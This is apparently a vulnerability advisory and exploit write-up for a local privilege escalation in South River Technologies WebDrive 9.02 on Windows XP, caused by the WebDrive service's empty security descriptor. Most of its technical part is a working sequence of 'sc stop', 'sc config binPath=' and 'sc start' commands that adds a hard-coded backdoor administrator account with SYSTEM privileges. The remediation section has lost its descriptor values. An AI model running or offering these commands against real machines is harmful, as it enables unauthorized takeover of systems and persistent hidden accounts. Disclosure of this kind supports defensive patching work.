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South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges

South River Technologies WebDrive Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Software site: http://www.webdrive.com/
Download location: http://www.webdrive.com/download/index.html

Tested against:
South River Technologies WebDrive 9.02 build 2232
on Microsoft Windows XP SP3

The "WebDrive Service" is installed with an empty security descriptor. A malicious user can
stop the service, then invoke the "sc config" command to replace the binary path with a value
of choice, then restart the service to run the command with SYSTEM privileges ex., run theese
commands as a limited user:

sc stop WebDriveService
sc config WebDriveService binPath= "cmd /c net user southriver kills /add && net localgroup Administrators southriver /add"
sc start WebDriveService
runas /noprofile /user:%COMPUTERNAME%\southriver cmd

now login as administrator with password "kills"


the security descriptor of the service is like this:

C:\>sc sdshow WebDriveService


change the security descriptor like the following:

[SC] SetServiceObjectSecurity SUCCESS

original url: http://retrogod.altervista.org/9sg_south_river_priv.html 

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